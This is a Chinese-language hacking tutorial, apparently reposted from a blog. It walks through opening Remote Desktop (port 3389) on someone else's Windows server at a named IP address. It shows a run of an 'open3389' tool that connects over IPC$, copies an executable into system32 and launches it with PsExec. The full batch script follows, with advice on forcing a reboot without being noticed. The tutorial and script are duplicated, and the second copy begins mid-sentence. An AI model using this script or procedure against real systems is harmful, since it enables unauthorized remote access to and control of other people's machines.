首先我们先找目标主机。(一定要找是server的主机,而不是专业版的,否则你安装不成功
可不能怪我!!呵呵 ^_^
由于时间原因,我已经预先找好了!!
我们先看他的3389开了没有
好了,没开^_^
我们来给他打开
**********************************************************
打开cmd窗口,然后打开cmd进入到open3389目录
**********************************************************
C:\Octopus\3389>open3389 202.164.172.78 xuanniao xuanniao
*******************Open3389*********************
使用方法:
open3389.bat ip user password
open3389.bat 目标ip 用户名 密码
************************************************
正在连接 "202.164.172.78……"
命令成功完成。
************************************************
成功连接上 [url=file://\\202.164.172.78]\\202.164.172.78[/url] !
复制HBULOT.exe 到 [url=file://\\202.164.172.78\admin$\system32]\\202.164.172.78\admin$\system32[/url] 目录
已复制 1 个文件。
************************************************
OK! 复制完毕
************************************************
正在在 [url=file://\\202.164.172.78]\\202.164.172.78[/url] 上执行HBULOT.exe
PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com
c:\winnt\system32\HBULOT.exe started on 202.164.172.78 with process ID 540.
[url=file://\\202.164.172.78\admin$\system32\HBULOT.exe]\\202.164.172.78\admin$\system32\HBULOT.exe[/url]
拒绝访问。
************************************************
3389 安装成功!
BINGLE!!!Yeah!!
等 [url=file://\\202.164.172.78]\\202.164.172.78[/url] 重起后,你就可以使用终端连接器连接上去了
[url=file://\\202.164.172.78\ipc$]\\202.164.172.78\ipc$[/url] 已经删除。
************************************************
Welcome to www.niuzu.net
************************************************
好了,等他重新启动后就可以连接上去了^_^
呵呵,如果你等不及的话而且不怕人家发现的话,可以手动让他重新启动!!
为了给大家一个直观的印象,我这里就手动 让他重新启动!!
先复制reboot.exe到对方目录
bat代码
@echo *******************Open3389*********************
@echo 使用方法:
@echo open3389.bat ip user password
@echo open3389.bat 目标ip 用户名 密码
@echo ************************************************
@echo 正在连接 "%1……"
@net use [url=file://\\%1\ipc$]\\%1\ipc$[/url] %3 /user:"%2"
@if errorlevel 1 goto help
@echo ************************************************
@echo 成功连接上 [url=file://\\%1]\\%1[/url] !
@echo 复制3389.bat 到 [url=file://\\%1\admin$\system32]\\%1\admin$\system32[/url] 目录
@copy 3389.bat [url=file://\\%1\admin$\system32]\\%1\admin$\system32[/url]
@echo ************************************************
@echo OK! 复制完毕
@echo ************************************************
@echo 正在在 [url=file://\\%1]\\%1[/url] 上执行3389.bat
@psexec -d [url=file://\\%1]\\%1[/url] c:\winnt\system32\3389.bat
@echo ************************************************
@echo 3389 安装成功!
@echo BINGLE!!!Yeah!!
@echo 等 [url=file://\\%1]\\%1[/url] 重起后,你就可以使用终端连接器连接上去了
@net use [url=file://\\%1\ipc$]\\%1\ipc$[/url] /delete
@echo ************************************************
@echo ************************************************
@echo ************************************************
@if errorlevel 0 goto end
:help
@echo ************************************************
@echo Connecting %1 ERROR!
@echo ************************************************
:end
可不能怪我!!呵呵 ^_^
由于时间原因,我已经预先找好了!!
我们先看他的3389开了没有
好了,没开^_^
我们来给他打开
**********************************************************
打开cmd窗口,然后打开cmd进入到open3389目录
**********************************************************
C:\Octopus\3389>open3389 202.164.172.78 xuanniao xuanniao
*******************Open3389*********************
使用方法:
open3389.bat ip user password
open3389.bat 目标ip 用户名 密码
************************************************
正在连接 "202.164.172.78……"
命令成功完成。
************************************************
成功连接上 [url=file://\\202.164.172.78]\\202.164.172.78[/url] !
复制HBULOT.exe 到 [url=file://\\202.164.172.78\admin$\system32]\\202.164.172.78\admin$\system32[/url] 目录
已复制 1 个文件。
************************************************
OK! 复制完毕
************************************************
正在在 [url=file://\\202.164.172.78]\\202.164.172.78[/url] 上执行HBULOT.exe
PsExec v1.31 - execute processes remotely
Copyright (C) 2001-2002 Mark Russinovich
www.sysinternals.com
c:\winnt\system32\HBULOT.exe started on 202.164.172.78 with process ID 540.
[url=file://\\202.164.172.78\admin$\system32\HBULOT.exe]\\202.164.172.78\admin$\system32\HBULOT.exe[/url]
拒绝访问。
************************************************
3389 安装成功!
BINGLE!!!Yeah!!
等 [url=file://\\202.164.172.78]\\202.164.172.78[/url] 重起后,你就可以使用终端连接器连接上去了
[url=file://\\202.164.172.78\ipc$]\\202.164.172.78\ipc$[/url] 已经删除。
************************************************
Welcome to www.niuzu.net
************************************************
好了,等他重新启动后就可以连接上去了^_^
呵呵,如果你等不及的话而且不怕人家发现的话,可以手动让他重新启动!!
为了给大家一个直观的印象,我这里就手动 让他重新启动!!
先复制reboot.exe到对方目录
bat代码
@echo *******************Open3389*********************
@echo 使用方法:
@echo open3389.bat ip user password
@echo open3389.bat 目标ip 用户名 密码
@echo ************************************************
@echo 正在连接 "%1……"
@net use [url=file://\\%1\ipc$]\\%1\ipc$[/url] %3 /user:"%2"
@if errorlevel 1 goto help
@echo ************************************************
@echo 成功连接上 [url=file://\\%1]\\%1[/url] !
@echo 复制3389.bat 到 [url=file://\\%1\admin$\system32]\\%1\admin$\system32[/url] 目录
@copy 3389.bat [url=file://\\%1\admin$\system32]\\%1\admin$\system32[/url]
@echo ************************************************
@echo OK! 复制完毕
@echo ************************************************
@echo 正在在 [url=file://\\%1]\\%1[/url] 上执行3389.bat
@psexec -d [url=file://\\%1]\\%1[/url] c:\winnt\system32\3389.bat
@echo ************************************************
@echo 3389 安装成功!
@echo BINGLE!!!Yeah!!
@echo 等 [url=file://\\%1]\\%1[/url] 重起后,你就可以使用终端连接器连接上去了
@net use [url=file://\\%1\ipc$]\\%1\ipc$[/url] /delete
@echo ************************************************
@echo ************************************************
@echo ************************************************
@if errorlevel 0 goto end
:help
@echo ************************************************
@echo Connecting %1 ERROR!
@echo ************************************************
:end
转载于:https://blog.51cto.com/beyondjiege/392847
1398
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
